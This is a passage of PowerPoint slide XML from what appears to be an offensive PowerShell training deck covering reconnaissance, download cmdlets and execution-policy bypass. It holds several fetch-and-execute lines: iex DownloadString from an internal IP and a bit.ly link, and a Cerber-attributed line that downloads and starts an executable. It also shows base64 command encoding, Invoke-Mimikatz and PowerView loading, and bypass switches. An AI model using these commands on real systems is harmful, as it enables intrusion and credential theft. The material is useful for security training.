            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> /all </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>whoami</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>priv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8A3D6-FC8B-4691-A3BA-54C25E2D20F3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1054107" y="4898489"/>
            <a:ext cx="28255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Calibri"/>
              </a:rPr>
              <a:t>Get-Module</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Import-Module –Module PowerView.ps1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>ps</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>&gt; . .\Invoke-Mimikatz.ps1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6440A0-F4F2-4001-9BE7-5D9C213C4A63}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005668" y="5797569"/>
            <a:ext cx="63713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$s = New-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>PSSession</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> B</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Copy-Item -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>FromSession</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> $s C:\Programs\temp\test.txt -Destination C:\temp\</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="12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CA9ED9-F5A6-426C-8EEB-3307AB12BA3E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1046968" y="4535758"/>
            <a:ext cx="300243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Expand-Archive c:\a.zip -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>DestinationPath</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> c:\a</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200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6710B7-59FF-4B5B-B88E-0B3275D58AE8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="639539" y="2017228"/>
            <a:ext cx="44439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PowerShell built in commands examples</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="16" name="Picture 16" descr="Зображення, що містить знімок екрана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8FA16736-F18A-4D55-B938-BABCB3200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19" y="5109792"/>
            <a:ext cx="5081851" cy="12205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A260270-63F7-4E17-8ECA-5CCA0C71D60E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8133930" y="6367899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Invoke-command</a:t>
            </a:r>
            <a:endParaRPr lang="uk-UA" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3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1A04154-1CF5-4A38-94F5-FC113118B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843" y="3614628"/>
            <a:ext cx="3952074" cy="1050367"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12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F32AE0D-B7AE-426A-9C18-F0F7D968D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843" y="1977867"/>
            <a:ext cx="3881377" cy="12318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3B68FA-E995-47B3-BD6A-DC7873490C85}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8013019" y="3215830"/>
            <a:ext cx="117206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cs typeface="Calibri"/>
              </a:rPr>
              <a:t>whoami</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>priv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597FE3-444B-40C3-9406-F8EB4003A9AA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8130855" y="4675179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Get-Process</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="288659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E6F0-0365-4996-86ED-FFF7DE98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1. First Steps. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:ea typeface="+mj-lt"/>
                <a:cs typeface="+mj-lt"/>
              </a:rPr>
              <a:t>.Net</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="+mj-lt"/>
                <a:cs typeface="+mj-lt"/>
              </a:rPr>
              <a:t> support.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5E269-53FF-4139-94B1-F3A6BFFA2EA8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="836468" y="1615786"/>
            <a:ext cx="4570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Scripts for download and execute cmdlets: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072647-6C18-4C9E-8B4B-F8295ED393E9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1221798" y="2013885"/>
            <a:ext cx="1032856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- and execute directly in memory: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  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>iex</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> (New-Object </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Net.WebClient</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>).</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>DownloadString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>('https://192.168.100.69/powerup.ps1')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- save on disc and execute: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  From </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Cerber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>geted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>ps_html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>):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(New-Object </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>System.Net.WebClient</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>).</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>DownloadFile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>('http://94.102.53[.]238/~yahoo/csrsv.exe',"$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>env:APPDATA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>\csrsv.exe");Start-Process ("$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>env:APPDATA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>\csrsv.exe")</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="12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3FC25-B531-47BF-9B5B-3260DC990C9B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1222165" y="3670486"/>
            <a:ext cx="6076949" cy="4616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$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>ADClass</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>=[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>System.DirectoryServices.ActiveDirectory.Domain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200">
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>ADClass</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>GetCurrentDomain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/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165FD3-F8E2-4C88-B2C0-2825257D3E95}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1222165" y="5131819"/>
            <a:ext cx="681663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$command = "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>iex</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> (New-Object </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Net.WebClient</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>).</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>DownloadString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>('https://192.168.100.69/payload.ps1')" </a:t>
            </a:r>
            <a:endParaRPr lang="uk-UA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$bytes = [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>System.Text.Encoding</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>]::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Unicode.GetBytes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>($command) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>encodedCommand</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> = [Convert]::ToBase64String($bytes)                 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0" err="1">
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>$powershell.exe -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>EncodedCommand</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>encodedCommand</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="12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1A58A-247E-45C9-A2FB-C100B321D85B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="836908" y="3303721"/>
            <a:ext cx="36989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Get Active Directory information:</a:t>
            </a:r>
            <a:endParaRPr lang="uk-UA" dirty="0">
              <a:ea typeface="+mn-lt"/>
              <a:cs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D98CD-0F4A-47A2-B4A5-5F0AFEAF6928}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="837716" y="457022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Encoding with base64:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture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484F8EB-E7CB-4EDD-B112-360B4ECCAD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8" t="11305" r="10231" b="76047"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5737513" y="3389066"/>
            <a:ext cx="5864983" cy="6700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6725A5-C911-4F9A-A257-EBE8D966E696}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7945582" y="4126923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Download cmdlets</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="338970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FDCD-F202-44B7-8AAA-17D531BA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2. Bypass Execution Policy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514551-CD8A-40A6-A998-E7618E31C4FA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="455468" y="1804672"/>
            <a:ext cx="43537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Check Execution policy:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>Get-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>ExecutionPolicy</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="120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Get-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>ExecutionPolicy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> –List</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Get-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>ExecutionPolicy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> -p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74DE2-D7F6-455A-B8DF-0A80C79F7CBA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="451139" y="2796138"/>
            <a:ext cx="7540334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Bypass </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>techniks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>powershell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>ExecutionPolicy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> bypass</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Powershell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> –c "some script"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>env:PSExecutionPolicyPreference</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>="bypass"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>powershell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>nop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> -c "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>iex</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>(New-Object </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Net.WebClient</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>).</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>DownloadString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>('http://bit.ly/1kEgbuH')"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>invoke-command -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>scriptblock</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> {Write-Host "My voice is my passport, verify me."}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>invoke-command -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>computername</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> Server01 -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>scriptblock</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> {get-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>executionpolicy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
